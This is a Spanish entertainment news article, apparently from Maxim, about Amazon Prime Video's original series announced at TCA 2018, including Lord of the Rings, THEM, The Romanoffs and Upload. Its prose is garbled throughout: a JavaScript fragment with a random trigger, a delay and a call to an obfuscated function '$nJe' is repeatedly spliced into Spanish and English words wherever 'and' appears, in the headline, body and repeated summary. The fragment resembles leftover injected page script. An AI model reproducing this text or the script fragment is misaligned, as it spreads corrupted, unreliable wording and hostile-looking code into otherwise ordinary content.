Las próximas series originales que producirá Amazon Prime Video

    Descubre las próximas series originales que tendrá Amazon Prime Video

    Amazon Prime Video tiene grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes proyectos que incluyen un serie original de El señor de los anillos.

    Autor: Redacción Maxim 1 agosto, 2018


     

    Amazon Prime Video anunció grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes producciones durante el Television Critics Association (TCA) 2018 

     

    El pasado fin de semana, se llevaron a cabo los Television Critics Association (TCA) Summer,  en los cuales Amazon Prime Video anunció varios proyectos para la producción de series originales para esta plataforma.

     

    Algunas ya se habían anunciado con antelación como  Lord of the Rings, sin embargo, ésta no será la única y aquí te decimos todos los detalles.

     

    Lord of the Rings

     

    Desde noviembre de 2017, ya habíamos hablado esto en Maxim, cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando se dio a conocer que Amazon se hizo de los derechos de televisión a nivel global para adaptar la saga de El señor de los anillos, basada en el libro de J.R.R. Tolkien.

     

     

    via GIPHY

     

    Este Amazon Prime Original se realizará entre Tolkien Estate andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and Trust, HarperCollins y New Line Cinema. La trilogía cinematográfica recaudó 6 mil millones de dólares en todo el mundo, por lo que su traslado al streaming genera mucha expectativa.

     

     

    Por su parte Amazon Studios anunció que JD Payne y Patrick McKay serán los guionistas encargados para adaptar la famosa saga. Al respecto comentaron:

     

    “Estamos absolutamente emocionados de asociarnos con Amazon para traerla de vuelta a la vida. Creemos que Frodo, emprendiendo un viaje desde La Comarca, con una gran responsabilidad — es el principio de la aventura de una vida”.

     

    Esta dupla de escritores ha trabajado en numerosos proyectos que incluyen  Star Trek 4 (2018),  Jungle Cruise (estrena en 2019) y  Escape (2017).

     

     

     

    Hermanos Russo

     

    Amazon busca crear una franquicia que deje huella a nivel global, es por esto que se asoció con AGBO Studios, de los hermanos Russo, para crear una serie de alcances mayúsculos. Dentro de este acuerdo los famosos directores encargados de las últimas películas de Avengerstendrán la libertad creativa para supervisar este ambicioso proyecto.

     

    ¡Ya queremos saber de qué se trata!

     

    via GIPHY

     

     

     

    THEM

     

    También se dio a conocer que se coproducirán dos temporadas de la serie de terror, THEM, de la productora ejecutiva Lena Waithe (The Chi, Dear White People), con Sony Pictures Television.

     

    La primera temporada será THEM: Covenant, y se desarrollará durante el año 1953, cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando Alfred y Lucky Emory se mudan de Carolina del Norte a Los Angeles. En su nuevo hogar se harán presentes fuerzas malévolas reales y sobrenaturales amenazan con provocarlos, atacarlos y destruirlos.

     

    via GIPHY

     

     

     

     The Expatriates

     

    La serie está a cargo de Blossom Films, la productora de Nicole Kidman. Está basada en la novela homónima de Janice Y.K. Lee, y será adaptada por la galardonada guionista, Alice Bell (The Beautiful Lie). Al respecto Kidman comentó:

     

    «Estoy muy emocionada de esta colaboración Blossom-Amazon. The Expatriates es solo el comienzo de nuestra meta compartida de hacer historias deliciosas con algo significativo que decir sobre el mundo”.

     

    via GIPHY

     

     

     

     The Romanoffs

     

    Otro anuncio importante es el estreno el próximo 12 de octubre de The Romanoffs, una serie creada, escrita, dirigida y producida por Matthew Weiner,  ganador de nueve premios Emmy por Mad Men.

     

    The Romanoffs contará la historia de ocho personas que creen ser descendientes de la mítica familia real rusa.

     

     

     

     

     

    Upload

     

    La última gran noticia que nos regaló Amazon el pasado fin de semana, es la producción de Upload, del ganador del Emmy, Greg Daniels (The Office, Parks andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and Recreation, King of the Hill) y su socio productor, Howard Klein.

     

    Esta comedia será protagonizada por Andy Allo  y Robbie Amell. Aún no se han dado muchos detalles al respecto de la trama, pero conociendo el trabajo de Daniels, podemos esperar algo grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande.

     

    via GIPHY

     

     

     

    ¿Cuál serie les gustaría ver más?

     

     

     

Amazon Prime Video tiene grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes proyectos que incluyen un serie original de El señor de los anillos.